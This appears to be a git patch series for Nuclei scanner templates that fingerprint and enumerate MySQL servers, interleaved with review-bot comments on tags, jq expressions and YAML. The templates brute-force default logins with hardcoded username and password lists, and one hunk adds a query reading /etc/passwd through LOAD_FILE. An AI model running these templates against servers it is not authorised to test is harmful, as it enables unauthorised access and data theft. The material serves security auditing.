@@ -0,0 +1,36 @@ +id: mysql-info + +info: + name: MySQL Info - Enumeration + author: pussycat0x + severity: info + description: | + Connects to a MySQL server and prints information such as the protocol and version numbers + reference: + - https://nmap.org/nsedoc/scripts/mysql-info.html + metadata: + shodan-query: port:3306 + tags: js,mssql,network + +javascript: + - code: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + var response = c.FingerprintMySQL(Host,Port); + Export(response); + + args: + Host: "{{Host}}" + Port: "3306" + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + json: + - '"Version: "+ .Version ' + - '"TLS "+ .TLS' + - '"Transport: "+ .Transport ' \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml index f45037c2d4..adcbf36d29 100644 --- a/javascript/enumeration/mysql/mysql-show-databases.yaml +++ b/javascript/enumeration/mysql/mysql-show-databases.yaml @@ -9,7 +9,7 @@ info: metadata: shodan-query: port:3306 verified: true - tags: js,mysql,network,fuzz + tags: js,mysql,network,enum javascript: - code: | @@ -25,14 +25,22 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - threads: 10 - attack: pitchfork - payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + usernames: + - anonymous + - root + - admin + - mysql + - nagiosxi + passwords: + - SqlServer0 + - root + - cloudera + - admin + - moves + attack: clusterbomb + stop-at-first-match: true matchers: - type: dsl dsl: @@ -42,4 +50,4 @@ javascript: - type: json part: response json: - - .Rows[] | .Database + - .Rows[] | .Database \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml index 6d3b05cbd1..67c7828345 100644 
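Review bot: The new mysql-info template is tagged `js,mssql,network` although it fingerprints MySQL (`require("nuclei/mysql")`, `FingerprintMySQL`); the tag should be `mysql`, matching the other templates in this commit, otherwise tag-based template selection misfiles it. The extractor `'"TLS "+ .TLS'` will also fail inside jq if `.TLS` is a boolean rather than a string, because jq cannot add a string and a boolean — `'"TLS: " + (.TLS|tostring)'` is safe for either type and matches the `Key: value` shape of the other two lines. The file is additionally written without a trailing newline.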
--- a/javascript/enumeration/mysql/mysql-show-variables.yaml +++ b/javascript/enumeration/mysql/mysql-show-variables.yaml @@ -9,7 +9,7 @@ info: - https://nmap.org/nsedoc/scripts/mysql-variables.html metadata: shodan-query: port:3306 - tags: js,mysql,network,fuzz + tags: js,mysql,network,enum javascript: - code: | @@ -25,14 +25,22 @@ javascript: Pass: "{{passwords}}" Query: "show variables;" - threads: 10 - attack: pitchfork - payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + usernames: + - anonymous + - root + - admin + - mysql + - nagiosxi + passwords: + - SqlServer0 + - root + - cloudera + - admin + - moves + attack: clusterbomb + stop-at-first-match: true matchers: - type: dsl dsl: @@ -42,4 +50,4 @@ javascript: - type: json part: response json: - - '.Rows[].Variable_name' + - '.Rows[].Variable_name' \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml index 11e39ecd2b..a2ea283790 100644 --- a/javascript/enumeration/mysql/mysql-user-enum.yaml +++ b/javascript/enumeration/mysql/mysql-user-enum.yaml @@ -11,7 +11,7 @@ info: metadata: shodan-query: port:3306 verified: true - tags: js,mysql,network,enum,fuzz + tags: js,mysql,network,enum javascript: - code: | @@ -27,14 +27,22 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - threads: 10 - attack: pitchfork - payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + usernames: + - anonymous + - root + - admin + - mysql + - nagiosxi + passwords: + - SqlServer0 + - root + - cloudera + - admin + - moves + attack: clusterbomb + stop-at-first-match: true matchers: - type: dsl dsl: @@ -44,4 +52,4 @@ javascript: - type: json part: response json: - - '.Rows[].user' + - '.Rows[].user' \ No newline at end of file 
From b151c4a41f692c8fda0529eb471f3b54f0098644 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 22 Mar 2024 19:41:12 +0530 Subject: [PATCH 12/13] mysql creds -update --- javascript/audit/mysql/mysql-load-file.yaml | 8 +++---- .../mysql/mysql-default-login.yaml | 23 +++++++++++++++---- .../mysql/mysql-show-databases.yaml | 8 +++---- .../mysql/mysql-show-variables.yaml | 8 +++---- .../enumeration/mysql/mysql-user-enum.yaml | 8 +++---- 5 files changed, 30 insertions(+), 25 deletions(-) diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml index 5f61527c6e..cede045998 100644 --- a/javascript/audit/mysql/mysql-load-file.yaml +++ b/javascript/audit/mysql/mysql-load-file.yaml @@ -28,17 +28,15 @@ javascript: payloads: usernames: - - anonymous - root - admin - mysql - - nagiosxi + - test passwords: - - SqlServer0 - root - - cloudera - admin - - moves + - mysql + - test attack: clusterbomb stop-at-first-match: true diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index a285e9e135..28c2aad48a 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -28,13 +28,26 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - threads: 10 - attack: pitchfork + args: + Host: "{{Host}}" + Port: "3306" + Query: SELECT LOAD_FILE('/etc/passwd') + User: "{{usernames}}" + Pass: "{{passwords}}" payloads: - usernames: helpers/wordlists/mysql-users.txt - passwords: helpers/wordlists/mysql-passwords.txt - stop-at-first-match: true + usernames: + - root + - admin + - mysql + - test + passwords: + - root + - admin + - mysql + - test + - + attack: clusterbomb matchers: - type: dsl diff --git a/javascript/enumeration/mysql/mysql-show-databases.yaml b/javascript/enumeration/mysql/mysql-show-databases.yaml index adcbf36d29..b18a97008a 100644 
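Review bot: The rewritten `payloads:` block in mysql-default-login ends the `passwords:` list with a bare `-`, which YAML parses as null rather than the empty string; if an empty-password attempt is intended, write it explicitly as `- ""` so the template does not depend on how the engine stringifies null. The hunk also removes `stop-at-first-match: true` without replacing it, unlike the four sibling templates in this commit that keep it, so the 4x5 clusterbomb keeps sending attempts after a valid credential is already found. Restoring `stop-at-first-match: true` under `attack: clusterbomb` brings the file in line with the others. The duplicated `args:` block introduced here is already removed by the following patch in the series.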
--- a/javascript/enumeration/mysql/mysql-show-databases.yaml +++ b/javascript/enumeration/mysql/mysql-show-databases.yaml @@ -27,17 +27,15 @@ javascript: payloads: usernames: - - anonymous - root - admin - mysql - - nagiosxi + - test passwords: - - SqlServer0 - root - - cloudera - admin - - moves + - mysql + - test attack: clusterbomb stop-at-first-match: true diff --git a/javascript/enumeration/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml index 67c7828345..727d251ba8 100644 --- a/javascript/enumeration/mysql/mysql-show-variables.yaml +++ b/javascript/enumeration/mysql/mysql-show-variables.yaml @@ -27,17 +27,15 @@ javascript: payloads: usernames: - - anonymous - root - admin - mysql - - nagiosxi + - test passwords: - - SqlServer0 - root - - cloudera - admin - - moves + - mysql + - test attack: clusterbomb stop-at-first-match: true diff --git a/javascript/enumeration/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml index a2ea283790..afc2f3b26c 100644 --- a/javascript/enumeration/mysql/mysql-user-enum.yaml +++ b/javascript/enumeration/mysql/mysql-user-enum.yaml @@ -29,17 +29,15 @@ javascript: payloads: usernames: - - anonymous - root - admin - mysql - - nagiosxi + - test passwords: - - SqlServer0 - root - - cloudera - admin - - moves + - mysql + - test attack: clusterbomb stop-at-first-match: true From 99f945de30a25303089c23177df7f93247c893e6 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 22 Mar 2024 19:45:15 +0530 Subject: [PATCH 13/13] Update mysql-default-login.yaml --- javascript/enumeration/mysql/mysql-default-login.yaml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index 28c2aad48a..f5b5535048 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml 
@@ -28,13 +28,6 @@ javascript: User: "{{usernames}}" Pass: "{{passwords}}" - args: - Host: "{{Host}}" - Port: "3306" - Query: SELECT LOAD_FILE('/etc/passwd') - User: "{{usernames}}" - Pass: "{{passwords}}" - payloads: usernames: - root